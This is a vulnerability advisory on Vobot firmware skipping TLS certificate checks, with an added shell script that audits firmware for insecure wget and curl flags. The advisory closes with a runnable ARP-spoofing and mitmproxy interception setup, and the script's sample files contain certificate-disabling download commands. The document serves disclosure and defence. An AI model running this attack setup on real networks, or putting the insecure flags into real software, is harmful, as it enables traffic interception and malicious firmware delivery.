6. February 2018 - Thomas Roth - firstname.lastname@example.org
CVSS: 10.0 Critical
This vulnerability has been confirmed to be exploitable. The vulnerability will potentially be published after 60 days or after a patch for the vulnerability has been released.
It was found that the Vobot firmware does not validate the certificates of the web services it connects to. This allows an attacker to conduct TLS man-in-the-middle attacks that can compromise the user's privacy and can potentially be used to gain remote code execution on the device.
In the firmware itself it was found that GNU Wget, a software package for retrieving files using HTTP and other protocols, is often invoked with the parameter --no-check-certificate, which explicitly disables certificate validation.
All HTTPS connections need to verify the authenticity of the host they are connecting to.
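As an added example (not part of the original advisory), a small POSIX shell audit that scans an extracted firmware root filesystem for scripts which disable certificate validation in the way described above, and shows the hardened wget form (validation kept on and pinned to the vendor CA bundle via --ca-certificate) next to the weak one. The sample file tree, paths and hostnames are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: audit an extracted firmware rootfs for shell scripts that turn
# off TLS certificate validation (wget --no-check-certificate, curl -k/--insecure).

# find_insecure_tls_invocations ROOTFS
# Prints "path:line:text" per offending line; returns 1 if any were found, else 0.
find_insecure_tls_invocations() {
    rootfs="$1"
    # Only match the flag as a separate argument, so hostnames such as
    # foo-k.example or text after a '#' comment marker do not trigger a hit.
    hits=$(grep -rnE \
        -e 'wget[^#]*[[:space:]]--no-check-certificate([[:space:]]|$)' \
        -e 'curl[^#]*[[:space:]](-[[:alpha:]]*k|--insecure)([[:space:]]|$)' \
        "$rootfs" 2>/dev/null || :)
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# count_insecure_tls_invocations ROOTFS -> number of offending lines
count_insecure_tls_invocations() {
    find_insecure_tls_invocations "$1" | wc -l | tr -d ' '
}

# make_sample_rootfs -> path of a constructed (not real) firmware tree
# containing one weak wget call, one hardened wget call and one weak curl call.
make_sample_rootfs() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/etc/init.d"
    cat > "$d/usr/bin/update.sh" <<'EOF'
#!/bin/sh
# weak: any certificate is accepted, so a MITM can serve arbitrary firmware
wget --no-check-certificate -O /tmp/fw.bin https://update.example.invalid/fw.bin
# hardened: validation stays on and is pinned to the vendor's own CA bundle
wget --ca-certificate=/etc/ssl/vendor-ca.pem -O /tmp/fw.bin https://update.example.invalid/fw.bin
EOF
    cat > "$d/etc/init.d/sync" <<'EOF'
#!/bin/sh
curl -sk https://api.example.invalid/time
EOF
    printf '%s' "$d"
}

# Stand-alone run: report findings in the sample tree, exit non-zero if any.
if [ "${1:-}" = "--demo" ]; then
    find_insecure_tls_invocations "$(make_sample_rootfs)"
fi
```

Run it with --demo to see the two offending lines; point find_insecure_tls_invocations at a real extracted rootfs to audit it.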
An attacker on the same network can conduct a man-in-the-middle attack using ARP spoofing. A transparent proxy such as mitmproxy can then intercept and modify all requests between the Vobot client and the different servers.
Example attack setup:
export VOBOT_IP=...    # e.g. 192.168.0.5
export GATEWAY_IP=...  # e.g. 192.168.0.1
export INTERFACE=...   # e.g. wlan0
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i $INTERFACE -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i $INTERFACE -p tcp --dport 443 -j REDIRECT --to-port 8080
# In separate terminals:
arpspoof -i $INTERFACE -t $VOBOT_IP $GATEWAY_IP >/dev/null &
arpspoof -i $INTERFACE -t $GATEWAY_IP $VOBOT_IP >/dev/null &
mitmproxy -T --host